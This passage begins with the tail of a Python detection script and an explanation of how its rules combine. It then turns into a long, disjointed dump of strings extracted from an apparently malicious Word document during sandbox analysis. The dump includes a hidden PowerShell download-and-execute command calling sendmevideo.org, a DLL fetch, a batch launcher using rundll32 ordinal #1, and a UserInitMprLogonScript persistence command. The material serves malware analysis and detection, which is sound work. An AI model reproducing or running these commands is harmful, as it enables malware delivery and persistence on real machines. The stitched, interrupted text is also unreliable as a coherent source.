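    follow-up (ordinal rundll32 launch or logon-script persistence) is high."""
    fired = {rule for hits in evaluate(events).values() for rule in hits}
    delivery = ("office_spawns_powershell" in fired
                and bool({"download_cradle", "encoded_command"} & fired))
    followup = bool({"rundll32_ordinal_export", "logon_script_persistence"} & fired)
    if delivery and followup:
        return "high"
    if delivery or followup:
        return "medium"
    return "none"


if __name__ == "__main__":
    for event_id, hits in evaluate(EVENTS).items():
        print(event_id, hits)
    print("verdict:", verdict(EVENTS))
```

The per-event rules are deliberately weak on their own (an admin's hidden-window script or a legitimate `rundll32 foo.dll,#2` would each fire one), which is why `verdict` only escalates when a delivery stage and a follow-up stage both appear in the same set of events; the benign control record trips nothing.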
StringFileInfo
Unicode based on Dropped File (carved_0.dll.1509628513544)
System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;
Ansi based on Process Commandline (00040140-00002460)
t{-E;X6?vX&+$Hy'r}}W6]1oXWV:DzHp*\;\)4{wt%n0,vFO9cxY:Y7,N%gwY PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I
Ansi based on Dropped File (~WRD0000.tmp)
v`g/~{_Mc4(i%a)S.Lp)D^i)XKf\m
Ansi based on Dropped File (~WRD0000.tmp)
VarFileInfo
Unicode based on Dropped File (carved_0.dll.1509628513544)
VerifyVersionInfoW
Ansi based on PCAP Processing (network.pcap)
Vladimir Script
Unicode based on Runtime Data (WINWORD.EXE )
VS_VERSION_INFO
Unicode based on Dropped File (carved_0.dll.1509628513544)
W=8}L$mNz7"T-ur_(/IuvX?z~6po+Ua/
Ansi based on Dropped File (~WRD0000.tmp)
www.goo.gl
Ansi based on PCAP Processing (network.pcap)
youtube.com
Ansi based on PCAP Processing (network.pcap)
youtubeeducation.com
Ansi based on PCAP Processing (network.pcap)
Z,P6vO[f6C=\f{Ya)7$vj?G(a
Ansi based on Dropped File (~WRD0000.tmp)
zk7^U}p'6XpgE3/,\hv.KDY
Ansi based on Dropped File (~WRD0000.tmp)
zMU=ZNz@*Qba@r"M:y+0Ow2}oIc,XP@&DBAIJqD(
Ansi based on Dropped File (~WRD0000.tmp)
{09477111-DE61-43CD-A5AA-D9F7B489301F}
Unicode based on Runtime Data (rundll32.exe )
|sJXOI|x"Ef.2%>>2S^Xb)?w.E"drtz]"=Z^Xcf8bm$$<R6g./
Ansi based on Dropped File (~WRD0000.tmp)
~xM`ijU <8PU 6o#\vMST';@5:k&017qq.bkx@lypx@lmla(y{%]
Ansi based on Dropped File (~WRD0000.tmp)
~xM`ijU <8PU 6o\vMSTs;@5oex@KA##8M
Ansi based on Dropped File (~WRD0000.tmp)
System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;
Ansi based on Process Commandline (00040140-00002460)
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}if (Test-Path $p){ $rd_p='%WINDIR%\+"\System32\rundll32.exe"New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;
Ansi based on Process Commandline (00040970-00001420)
/dh2025e/eee.txt
Ansi based on PCAP Processing (PCAP)
/dh2025e/eh.dll
Ansi based on PCAP Processing (PCAP)
sendmevideo.org
Ansi based on PCAP Processing (PCAP)
<h1>Not Found</h1>The requested URL // was not found on this server.
Ansi based on Dropped File (VRzZ5.vnd[1].txt)
/n "C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx"
Ansi based on Process Commandline (WINWORD.EXE)
%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll
Unicode based on Runtime Data (WINWORD.EXE )
@Arial Unicode MS
Unicode based on Runtime Data (WINWORD.EXE )
@Batang
Unicode based on Runtime Data (WINWORD.EXE )
@BatangChe
Unicode based on Runtime Data (WINWORD.EXE )
@DFKai-SB
Unicode based on Runtime Data (WINWORD.EXE )
@Dotum
Unicode based on Runtime Data (WINWORD.EXE )
@DotumChe
Unicode based on Runtime Data (WINWORD.EXE )
@FangSong
Unicode based on Runtime Data (WINWORD.EXE )
@Gulim
Unicode based on Runtime Data (WINWORD.EXE )
@GulimChe
Unicode based on Runtime Data (WINWORD.EXE )
@Gungsuh
Unicode based on Runtime Data (WINWORD.EXE )
@GungsuhChe
Unicode based on Runtime Data (WINWORD.EXE )
@KaiTi
Unicode based on Runtime Data (WINWORD.EXE )
@Malgun Gothic
Unicode based on Runtime Data (WINWORD.EXE )
@Meiryo
Unicode based on Runtime Data (WINWORD.EXE )
@Meiryo UI
Unicode based on Runtime Data (WINWORD.EXE )
@Microsoft JhengHei
Unicode based on Runtime Data (WINWORD.EXE )
@Microsoft YaHei
Unicode based on Runtime Data (WINWORD.EXE )
@MingLiU
Unicode based on Runtime Data (WINWORD.EXE )
@MingLiU-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
@MingLiU_HKSCS
Unicode based on Runtime Data (WINWORD.EXE )
@MingLiU_HKSCS-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
@MS Gothic
Unicode based on Runtime Data (WINWORD.EXE )
@MS Mincho
Unicode based on Runtime Data (WINWORD.EXE )
@MS PGothic
Unicode based on Runtime Data (WINWORD.EXE )
@MS PMincho
Unicode based on Runtime Data (WINWORD.EXE )
@MS UI Gothic
Unicode based on Runtime Data (WINWORD.EXE )
@NSimSun
Unicode based on Runtime Data (WINWORD.EXE )
@PMingLiU
Unicode based on Runtime Data (WINWORD.EXE )
@PMingLiU-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
@SimHei
Unicode based on Runtime Data (WINWORD.EXE )
@SimSun
Unicode based on Runtime Data (WINWORD.EXE )
@SimSun-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D353DC2DAD29B0][O00000000]*C:\
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D353DC2DB036F0][O00000000]*C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx
Unicode based on Runtime Data (WINWORD.EXE )
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (WINWORD.EXE )
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (WINWORD.EXE )
Agency FB
Unicode based on Runtime Data (WINWORD.EXE )
AgentAnim
Unicode based on Runtime Data (WINWORD.EXE )
Aharoni
Unicode based on Runtime Data (WINWORD.EXE )
Algerian
Unicode based on Runtime Data (WINWORD.EXE )
Andalus
Unicode based on Runtime Data (WINWORD.EXE )
Angsana New
Unicode based on Runtime Data (WINWORD.EXE )
AngsanaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Aparajita
Unicode based on Runtime Data (WINWORD.EXE )
Arabic Typesetting
Unicode based on Runtime Data (WINWORD.EXE )
Arial
Unicode based on Runtime Data (WINWORD.EXE )
Arial Black
Unicode based on Runtime Data (WINWORD.EXE )
Arial Narrow
Unicode based on Runtime Data (WINWORD.EXE )
Arial Rounded MT Bold
Unicode based on Runtime Data (WINWORD.EXE )
Arial Unicode MS
Unicode based on Runtime Data (WINWORD.EXE )
AutoDetect
Unicode based on Runtime Data (WINWORD.EXE )
Baskerville Old Face
Unicode based on Runtime Data (WINWORD.EXE )
Batang
Unicode based on Runtime Data (WINWORD.EXE )
BatangChe
Unicode based on Runtime Data (WINWORD.EXE )
Bauhaus 93
Unicode based on Runtime Data (WINWORD.EXE )
BB0744FB
Unicode based on Runtime Data (WINWORD.EXE )
Bell MT
Unicode based on Runtime Data (WINWORD.EXE )
Berlin Sans FB
Unicode based on Runtime Data (WINWORD.EXE )
Berlin Sans FB Demi
Unicode based on Runtime Data (WINWORD.EXE )
Bernard MT Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Blackadder ITC
Unicode based on Runtime Data (WINWORD.EXE )
Bodoni MT
Unicode based on Runtime Data (WINWORD.EXE )
Bodoni MT Black
Unicode based on Runtime Data (WINWORD.EXE )
Bodoni MT Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Bodoni MT Poster Compressed
Unicode based on Runtime Data (WINWORD.EXE )
Book Antiqua
Unicode based on Runtime Data (WINWORD.EXE )
Bookman Old Style
Unicode based on Runtime Data (WINWORD.EXE )
Bookshelf Symbol 7
Unicode based on Runtime Data (WINWORD.EXE )
Bradley Hand ITC
Unicode based on Runtime Data (WINWORD.EXE )
Britannic Bold
Unicode based on Runtime Data (WINWORD.EXE )
Broadway
Unicode based on Runtime Data (WINWORD.EXE )
Browallia New
Unicode based on Runtime Data (WINWORD.EXE )
BrowalliaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Brush Script MT
Unicode based on Runtime Data (WINWORD.EXE )
Californian FB
Unicode based on Runtime Data (WINWORD.EXE )
Calisto MT
Unicode based on Runtime Data (WINWORD.EXE )
Cambria Math
Unicode based on Runtime Data (WINWORD.EXE )
Candara
Unicode based on Runtime Data (WINWORD.EXE )
Castellar
Unicode based on Runtime Data (WINWORD.EXE )
Centaur
Unicode based on Runtime Data (WINWORD.EXE )
Century
Unicode based on Runtime Data (WINWORD.EXE )
Century Gothic
Unicode based on Runtime Data (WINWORD.EXE )
Century Schoolbook
Unicode based on Runtime Data (WINWORD.EXE )
Chiller
Unicode based on Runtime Data (WINWORD.EXE )
Colonna MT
Unicode based on Runtime Data (WINWORD.EXE )
Comic Sans MS
Unicode based on Runtime Data (WINWORD.EXE )
Consolas
Unicode based on Runtime Data (WINWORD.EXE )
Constantia
Unicode based on Runtime Data (WINWORD.EXE )
Cooper Black
Unicode based on Runtime Data (WINWORD.EXE )
Copperplate Gothic Bold
Unicode based on Runtime Data (WINWORD.EXE )
Copperplate Gothic Light
Unicode based on Runtime Data (WINWORD.EXE )
Corbel
Unicode based on Runtime Data (WINWORD.EXE )
Cordia New
Unicode based on Runtime Data (WINWORD.EXE )
CordiaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Courier New
Unicode based on Runtime Data (WINWORD.EXE )
Curlz MT
Unicode based on Runtime Data (WINWORD.EXE )
DaunPenh
Unicode based on Runtime Data (WINWORD.EXE )
David
Unicode based on Runtime Data (WINWORD.EXE )
DFKai-SB
Unicode based on Runtime Data (WINWORD.EXE )
DilleniaUPC
Unicode based on Runtime Data (WINWORD.EXE )
DokChampa
Unicode based on Runtime Data (WINWORD.EXE )
Dotum
Unicode based on Runtime Data (WINWORD.EXE )
DotumChe
Unicode based on Runtime Data (WINWORD.EXE )
Ebrima
Unicode based on Runtime Data (WINWORD.EXE )
Edwardian Script ITC
Unicode based on Runtime Data (WINWORD.EXE )
Elephant
Unicode based on Runtime Data (WINWORD.EXE )
Engravers MT
Unicode based on Runtime Data (WINWORD.EXE )
Eras Bold ITC
Unicode based on Runtime Data (WINWORD.EXE )
Eras Demi ITC
Unicode based on Runtime Data (WINWORD.EXE )
Eras Light ITC
Unicode based on Runtime Data (WINWORD.EXE )
Eras Medium ITC
Unicode based on Runtime Data (WINWORD.EXE )
Estrangelo Edessa
Unicode based on Runtime Data (WINWORD.EXE )
EucrosiaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Euphemia
Unicode based on Runtime Data (WINWORD.EXE )
FangSong
Unicode based on Runtime Data (WINWORD.EXE )
Felix Titling
Unicode based on Runtime Data (WINWORD.EXE )
Footlight MT Light
Unicode based on Runtime Data (WINWORD.EXE )
Forte
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Book
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Demi
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Demi Cond
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Heavy
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Medium
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Medium Cond
Unicode based on Runtime Data (WINWORD.EXE )
FrankRuehl
Unicode based on Runtime Data (WINWORD.EXE )
FreesiaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Freestyle Script
Unicode based on Runtime Data (WINWORD.EXE )
French Script MT
Unicode based on Runtime Data (WINWORD.EXE )
Gabriola
Unicode based on Runtime Data (WINWORD.EXE )
Garamond
Unicode based on Runtime Data (WINWORD.EXE )
Gautami
Unicode based on Runtime Data (WINWORD.EXE )
Georgia
Unicode based on Runtime Data (WINWORD.EXE )
Gill Sans MT
Unicode based on Runtime Data (WINWORD.EXE )
Gill Sans MT Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Gill Sans MT Ext Condensed Bold
Unicode based on Runtime Data (WINWORD.EXE )
Gill Sans Ultra Bold
Unicode based on Runtime Data (WINWORD.EXE )
Gill Sans Ultra Bold Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Gisha
Unicode based on Runtime Data (WINWORD.EXE )
Gloucester MT Extra Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Goudy Old Style
Unicode based on Runtime Data (WINWORD.EXE )
Goudy Stout
Unicode based on Runtime Data (WINWORD.EXE )
Gulim
Unicode based on Runtime Data (WINWORD.EXE )
GulimChe
Unicode based on Runtime Data (WINWORD.EXE )
Gungsuh
Unicode based on Runtime Data (WINWORD.EXE )
GungsuhChe
Unicode based on Runtime Data (WINWORD.EXE )
Haettenschweiler
Unicode based on Runtime Data (WINWORD.EXE )
Harlow Solid Italic
Unicode based on Runtime Data (WINWORD.EXE )
Harrington
Unicode based on Runtime Data (WINWORD.EXE )
High Tower Text
Unicode based on Runtime Data (WINWORD.EXE )
Impact
Unicode based on Runtime Data (WINWORD.EXE )
Imprint MT Shadow
Unicode based on Runtime Data (WINWORD.EXE )
Informal Roman
Unicode based on Runtime Data (WINWORD.EXE )
IntranetName
Unicode based on Runtime Data (WINWORD.EXE )
IrisUPC
Unicode based on Runtime Data (WINWORD.EXE )
Iskoola Pota
Unicode based on Runtime Data (WINWORD.EXE )
Item 1
Unicode based on Runtime Data (WINWORD.EXE )
Item 10
Unicode based on Runtime Data (WINWORD.EXE )
Item 11
Unicode based on Runtime Data (WINWORD.EXE )
Item 12
Unicode based on Runtime Data (WINWORD.EXE )
Item 13
Unicode based on Runtime Data (WINWORD.EXE )
Item 14
Unicode based on Runtime Data (WINWORD.EXE )
Item 15
Unicode based on Runtime Data (WINWORD.EXE )
Item 16
Unicode based on Runtime Data (WINWORD.EXE )
Item 17
Unicode based on Runtime Data (WINWORD.EXE )
Item 18
Unicode based on Runtime Data (WINWORD.EXE )
Item 19
Unicode based on Runtime Data (WINWORD.EXE )
Item 2
Unicode based on Runtime Data (WINWORD.EXE )
Item 20
Unicode based on Runtime Data (WINWORD.EXE )
Item 21
Unicode based on Runtime Data (WINWORD.EXE )
Item 22
Unicode based on Runtime Data (WINWORD.EXE )
Item 23
Unicode based on Runtime Data (WINWORD.EXE )
Item 24
Unicode based on Runtime Data (WINWORD.EXE )
Item 25
Unicode based on Runtime Data (WINWORD.EXE )
Item 26
Unicode based on Runtime Data (WINWORD.EXE )
Item 27
Unicode based on Runtime Data (WINWORD.EXE )
Item 28
Unicode based on Runtime Data (WINWORD.EXE )
Item 29
Unicode based on Runtime Data (WINWORD.EXE )
Item 3
Unicode based on Runtime Data (WINWORD.EXE )
Item 30
Unicode based on Runtime Data (WINWORD.EXE )
Item 31
Unicode based on Runtime Data (WINWORD.EXE )
Item 32
Unicode based on Runtime Data (WINWORD.EXE )
Item 33
Unicode based on Runtime Data (WINWORD.EXE )
Item 34
Unicode based on Runtime Data (WINWORD.EXE )
Item 35
Unicode based on Runtime Data (WINWORD.EXE )
Item 36
Unicode based on Runtime Data (WINWORD.EXE )
Item 37
Unicode based on Runtime Data (WINWORD.EXE )
Item 38
Unicode based on Runtime Data (WINWORD.EXE )
Item 39
Unicode based on Runtime Data (WINWORD.EXE )
Item 4
Unicode based on Runtime Data (WINWORD.EXE )
Item 40
Unicode based on Runtime Data (WINWORD.EXE )
Item 41
Unicode based on Runtime Data (WINWORD.EXE )
Item 42
Unicode based on Runtime Data (WINWORD.EXE )
Item 43
Unicode based on Runtime Data (WINWORD.EXE )
Item 44
Unicode based on Runtime Data (WINWORD.EXE )
Item 45
Unicode based on Runtime Data (WINWORD.EXE )
Item 46
Unicode based on Runtime Data (WINWORD.EXE )
Item 47
Unicode based on Runtime Data (WINWORD.EXE )
Item 48
Unicode based on Runtime Data (WINWORD.EXE )
Item 49
Unicode based on Runtime Data (WINWORD.EXE )
Item 5
Unicode based on Runtime Data (WINWORD.EXE )
Item 50
Unicode based on Runtime Data (WINWORD.EXE )
Item 6
Unicode based on Runtime Data (WINWORD.EXE )
Item 7
Unicode based on Runtime Data (WINWORD.EXE )
Item 8
Unicode based on Runtime Data (WINWORD.EXE )
Item 9
Unicode based on Runtime Data (WINWORD.EXE )
JasmineUPC
Unicode based on Runtime Data (WINWORD.EXE )
Jokerman
Unicode based on Runtime Data (WINWORD.EXE )
Juice ITC
Unicode based on Runtime Data (WINWORD.EXE )
KaiTi
Unicode based on Runtime Data (WINWORD.EXE )
Kalinga
Unicode based on Runtime Data (WINWORD.EXE )
Kartika
%s "%s", %s
Unicode based on Dropped File (carved_0.dll.1509628513544)
%s - %lu
Ansi based on Dropped File (carved_0.dll.1509628513544)
.edata
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$2
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$3
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$4
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$5
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$6
Ansi based on Dropped File (carved_0.dll.1509628513544)
.rdata
Ansi based on Dropped File (carved_0.dll.1509628513544)
.rsrc
Ansi based on Dropped File (carved_0.dll.1509628513544)
.rsrc$01
Ansi based on Dropped File (carved_0.dll.1509628513544)
.rsrc$02
Ansi based on Dropped File (carved_0.dll.1509628513544)
.text
Ansi based on Dropped File (carved_0.dll.1509628513544)
.text$mn
Ansi based on Dropped File (carved_0.dll.1509628513544)
@.data
Ansi based on Dropped File (carved_0.dll.1509628513544)
@.reloc
Ansi based on Dropped File (carved_0.dll.1509628513544)
`.rdata
Ansi based on Dropped File (carved_0.dll.1509628513544)
CompanyName
Unicode based on Dropped File (carved_0.dll.1509628513544)
FileDescription
Unicode based on Dropped File (carved_0.dll.1509628513544)
FileVersion
Unicode based on Dropped File (carved_0.dll.1509628513544)
GdipFree
Ansi based on Dropped File (carved_0.dll.1509628513544)
GetExitCodeProcess
Ansi based on Dropped File (carved_0.dll.1509628513544)
HeapFree
Ansi based on Dropped File (carved_0.dll.1509628513544)
image/jpeg
Unicode based on Dropped File (carved_0.dll.1509628513544)
InternalName
Unicode based on Dropped File (carved_0.dll.1509628513544)
LegalCopyright
Unicode based on Dropped File (carved_0.dll.1509628513544)
lstrlenA
Ansi based on Dropped File (carved_0.dll.1509628513544)
lstrlenW
Ansi based on Dropped File (carved_0.dll.1509628513544)
ProductName
Unicode based on Dropped File (carved_0.dll.1509628513544)
ReadFile
Ansi based on Dropped File (carved_0.dll.1509628513544)
Sleep
Ansi based on Dropped File (carved_0.dll.1509628513544)
StringFileInfo
Unicode based on Dropped File (carved_0.dll.1509628513544)
VarFileInfo
Unicode based on Dropped File (carved_0.dll.1509628513544)
VS_VERSION_INFO
Unicode based on Dropped File (carved_0.dll.1509628513544)
if NOT exist %inst_pck % (exit)
Ansi based on Dropped File (mvdrt.bat)
set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"
Ansi based on Dropped File (mvdrt.bat)
set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"if NOT exist %inst_pck % (exit)start rundll32.exe %inst_pck %,#1
Ansi based on Dropped File (mvdrt.bat)
start rundll32.exe %inst_pck %,#1
Ansi based on Dropped File (mvdrt.bat)
!This program cannot be run in DOS mode.$
Ansi based on PCAP Processing (network.pcap)
ADVAPI32.dll
Ansi based on PCAP Processing (network.pcap)
authroot.stl
Ansi based on PCAP Processing (network.pcap)
cfootprint
Ansi based on PCAP Processing (network.pcap)
CloseHandle
Ansi based on PCAP Processing (network.pcap)
CreateDirectoryW
Ansi based on PCAP Processing (network.pcap)
CreateFileMappingA
Ansi based on PCAP Processing (network.pcap)
CreateFileW
Ansi based on PCAP Processing (network.pcap)
CreateMutexA
Ansi based on PCAP Processing (network.pcap)
CreateRemoteThread
Ansi based on PCAP Processing (network.pcap)
CreateThread
Ansi based on PCAP Processing (network.pcap)
CreateToolhelp32Snapshot
Ansi based on PCAP Processing (network.pcap)
CRYPT32.dll
Ansi based on PCAP Processing (network.pcap)
CryptBinaryToStringA
Ansi based on PCAP Processing (network.pcap)
CryptStringToBinaryA
Ansi based on PCAP Processing (network.pcap)
DeleteFileW
Ansi based on PCAP Processing (network.pcap)
DisableThreadLibraryCalls
Ansi based on PCAP Processing (network.pcap)
DispatchMessageA
Ansi based on PCAP Processing (network.pcap)
downloadwindowsupdate
Ansi based on PCAP Processing (network.pcap)
FreeLibrary
Ansi based on PCAP Processing (network.pcap)
GdipAlloc
Ansi based on PCAP Processing (network.pcap)
GdipCloneImage
Ansi based on PCAP Processing (network.pcap)
GdipCreateBitmapFromHBITMAP
Ansi based on PCAP Processing (network.pcap)
GdipDisposeImage
Ansi based on PCAP Processing (network.pcap)
GdipGetImageEncoders
Ansi based on PCAP Processing (network.pcap)
GdipGetImageEncodersSize
Ansi based on PCAP Processing (network.pcap)
gdiplus.dll
Ansi based on PCAP Processing (network.pcap)
GdiplusShutdown
Ansi based on PCAP Processing (network.pcap)
GdiplusStartup
Ansi based on PCAP Processing (network.pcap)
GdipSaveImageToStream
Ansi based on PCAP Processing (network.pcap)
GET /dh2025e/eee.txt HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive
Ansi based on PCAP Processing (network.pcap)
GET /dh2025e/eh.dll HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive!
Ansi based on PCAP Processing (network.pcap)
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1Cache-Control: max-age = 86405Connection: Keep-AliveAccept: */*If-Modified-Since: Sat, 12 Nov 2016 01:34:12 GMTIf-None-Match: "02e4de843cd21:0"User-Agent: Microsoft-CryptoAPI/6.1Host: www.download.windowsupdate.com0
Ansi based on PCAP Processing (network.pcap)
GetAdaptersAddresses
Ansi based on PCAP Processing (network.pcap)
GetCurrentProcess
Ansi based on PCAP Processing (network.pcap)
GetExitCodeThread
Ansi based on PCAP Processing (network.pcap)
GetFileSize
Ansi based on PCAP Processing (network.pcap)
GetLastError
Ansi based on PCAP Processing (network.pcap)
GetMessageA
Ansi based on PCAP Processing (network.pcap)
GetModuleHandleA
Ansi based on PCAP Processing (network.pcap)
GetPrivateProfileStringW
Ansi based on PCAP Processing (network.pcap)
GetProcAddress
Ansi based on PCAP Processing (network.pcap)
GetProcessHeap
Ansi based on PCAP Processing (network.pcap)
GetSystemInfo
Ansi based on PCAP Processing (network.pcap)
GetSystemMetrics
Ansi based on PCAP Processing (network.pcap)
GetSystemTimeAsFileTime
Ansi based on PCAP Processing (network.pcap)
GetTickCount
Ansi based on PCAP Processing (network.pcap)
GetVersionExA
Ansi based on PCAP Processing (network.pcap)
GetVolumeInformationW
Ansi based on PCAP Processing (network.pcap)
HeapAlloc
Ansi based on PCAP Processing (network.pcap)
HeapReAlloc
Ansi based on PCAP Processing (network.pcap)
HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 11:35:21 GMTContent-Type: application/vnd.ms-cab-compressedContent-Length: 53978Connection: keep-aliveCache-Control: max-age=604800ETag: "014e8acee33d31:0"Expires: Tue, 07 Nov 2017 11:35:20 GMTLast-Modified: Fri, 22 Sep 2017 22:03:52 GMTServer: Microsoft-IIS/8.5MSRegion: EMEAx-ccc: FRx-cid: 3X-Powered-By: ASP.NETAge: 5687Accept-Ranges: bytesMSCF
Ansi based on PCAP Processing (network.pcap)
HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:40 GMTServer: Apache/2.4.6 (CentOS)Last-Modified: Tue, 31 Oct 2017 12:13:53 GMTETag: "7f0-55cd6b0447ebb"Accept-Ranges: bytesContent-Length: 2032Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/plain; charset=UTF-
Ansi based on PCAP Processing (network.pcap)
HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:46 GMTServer: Apache/2.4.6 (CentOS)Last-Modified: Tue, 31 Oct 2017 13:16:40 GMTETag: "7e00-55cd790d0d6eb"Accept-Ranges: bytesContent-Length: 32256Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamMZ
Ansi based on PCAP Processing (network.pcap)
HttpOpenRequestA
Ansi based on PCAP Processing (network.pcap)
HttpQueryInfoA
Ansi based on PCAP Processing (network.pcap)
HttpSendRequestA
Ansi based on PCAP Processing (network.pcap)
InternetCloseHandle
Ansi based on PCAP Processing (network.pcap)
InternetConnectA
Ansi based on PCAP Processing (network.pcap)
InternetOpenA
Ansi based on PCAP Processing (network.pcap)
InternetQueryOptionA
Ansi based on PCAP Processing (network.pcap)
InternetReadFile
Ansi based on PCAP Processing (network.pcap)
InternetSetOptionA
Ansi based on PCAP Processing (network.pcap)
IPHLPAPI.DLL
Ansi based on PCAP Processing (network.pcap)
IsWow64Process
Ansi based on PCAP Processing (network.pcap)
KERNEL32.dll
Ansi based on PCAP Processing (network.pcap)
LoadLibraryA
Ansi based on PCAP Processing (network.pcap)
LoadLibraryW
Ansi based on PCAP Processing (network.pcap)
lstrcmpiA
Ansi based on PCAP Processing (network.pcap)
MapViewOfFile
Ansi based on PCAP Processing (network.pcap)
MultiByteToWideChar
Ansi based on PCAP Processing (network.pcap)
OpenFileMappingA
Ansi based on PCAP Processing (network.pcap)
Process32First
Ansi based on PCAP Processing (network.pcap)
Process32Next
Ansi based on PCAP Processing (network.pcap)
QueryPerformanceCounter
Ansi based on PCAP Processing (network.pcap)
RegCloseKey
Ansi based on PCAP Processing (network.pcap)
RegCreateKeyExA
Ansi based on PCAP Processing (network.pcap)
RegOpenKeyExA
Ansi based on PCAP Processing (network.pcap)
RegQueryValueExA
Ansi based on PCAP Processing (network.pcap)
RegSetValueExA
Ansi based on PCAP Processing (network.pcap)
satellitedeluxpanorama
Ansi based on PCAP Processing (network.pcap)
satellitedeluxpanorama.com
Ansi based on PCAP Processing (network.pcap)
secnt.dll
Ansi based on PCAP Processing (network.pcap)
sendmevideo
Ansi based on PCAP Processing (network.pcap)
SetLastError
Ansi based on PCAP Processing (network.pcap)
SHELL32.dll
Ansi based on PCAP Processing (network.pcap)
SHGetSpecialFolderPathW
Ansi based on PCAP Processing (network.pcap)
TranslateMessage
Ansi based on PCAP Processing (network.pcap)
UnmapViewOfFile
Ansi based on PCAP Processing (network.pcap)
USER32.dll
Ansi based on PCAP Processing (network.pcap)
VerifyVersionInfoW
Ansi based on PCAP Processing (network.pcap)
VerSetConditionMask
Ansi based on PCAP Processing (network.pcap)
VirtualAlloc
Ansi based on PCAP Processing (network.pcap)
VirtualFree
Ansi based on PCAP Processing (network.pcap)
WaitForSingleObject
Ansi based on PCAP Processing (network.pcap)
WideCharToMultiByte
Ansi based on PCAP Processing (network.pcap)
WININET.dll
Ansi based on PCAP Processing (network.pcap)
WriteFile
Ansi based on PCAP Processing (network.pcap)
WS2_32.dll
Ansi based on PCAP Processing (network.pcap)
wsprintfA
Ansi based on PCAP Processing (network.pcap)
wsprintfW
Ansi based on PCAP Processing (network.pcap)
C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # .EXE a
Ansi based on Process Commandline (powershell.exe)
rasman
Ansi based on Runtime Data (powershell.exe )
RASMAN
Unicode based on Runtime Data (powershell.exe )
%ALLUSERSPROFILE%\mvdrt.dll,#1
Ansi based on Process Commandline (rundll32.exe)
AutoConfigURL
Unicode based on Runtime Data (rundll32.exe )
CryptSvc
Unicode based on Runtime Data (rundll32.exe )
cryptsvc
Unicode based on Runtime Data (rundll32.exe )
DefaultConnectionSettings
Unicode based on Runtime Data (rundll32.exe )
en-US
Unicode based on Runtime Data (rundll32.exe )
gpsvc
Unicode based on Runtime Data (rundll32.exe )
IETldDllVersionHigh
Unicode based on Runtime Data (rundll32.exe )
IETldDllVersionLow
Unicode based on Runtime Data (rundll32.exe )
IETldVersionHigh
Unicode based on Runtime Data (rundll32.exe )
IETldVersionLow
Unicode based on Runtime Data (rundll32.exe )
LanguageList
Unicode based on Runtime Data (rundll32.exe )
Network
Unicode based on Runtime Data (rundll32.exe )
ProxyEnable
Unicode based on Runtime Data (rundll32.exe )
ProxyOverride
Unicode based on Runtime Data (rundll32.exe )
ProxyServer
Unicode based on Runtime Data (rundll32.exe )
SavedLegacySettings
Unicode based on Runtime Data (rundll32.exe )
ServicesActive
Unicode based on Runtime Data (rundll32.exe )
StaleIETldCache
Unicode based on Runtime Data (rundll32.exe )
TLDUpdates
Unicode based on Runtime Data (rundll32.exe )
WpadDecision
Unicode based on Runtime Data (rundll32.exe )
WpadDecisionReason
Unicode based on Runtime Data (rundll32.exe )
WpadDecisionTime
Unicode based on Runtime Data (rundll32.exe )
WpadLastNetwork
